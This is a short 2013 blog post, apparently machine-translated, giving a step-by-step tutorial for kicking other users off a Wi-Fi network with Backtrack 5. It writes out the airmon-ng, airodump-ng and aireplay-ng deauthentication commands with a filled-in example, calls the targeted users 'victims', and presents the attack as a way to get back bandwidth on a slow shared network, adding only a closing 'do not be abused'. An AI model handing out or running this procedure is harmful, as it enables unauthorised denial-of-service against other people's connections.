Saturday, January 19, 2013

disconnect the network through the terminal on backtrack 5


I get annoyed if temporarily cool ONLINE .... network suddenly slow. Luckily my users backtrack 5 ..
ok, watch my step in deciding another person's network using Backtrack
.
  • Open a terminal and type ifconfig to check your interface.
  • wlan0 is mine. Maybe yours wlan1 dl
  • Enable monitor mode with the command :
airmon-ng start wlan0
  • Monitor mode is active. For scanning the victim, enter the command :
airodump-ng mon0
  • The scanning process as shown
  • ctrl + C to stop scanning. specify the target (eg, 70: f1: a1: b2: 72:77)
  • Step decides victim network, enter the following command
aireplay-ng -0 jumlahpaket -a BSSID -c Macadresskorban mon0
  1. number of packages: network disconnection depends on the length of packet.
  2. to note the BSSID sensor scans the red.
eg.(aireplay-ng -0 500 -a 11:22:33:44:55:66 -c 70:f1:a1:b2:72:77 mon0)
  •  The process successfully if it looks like this
Good luck ... do not be abused



Recent Posts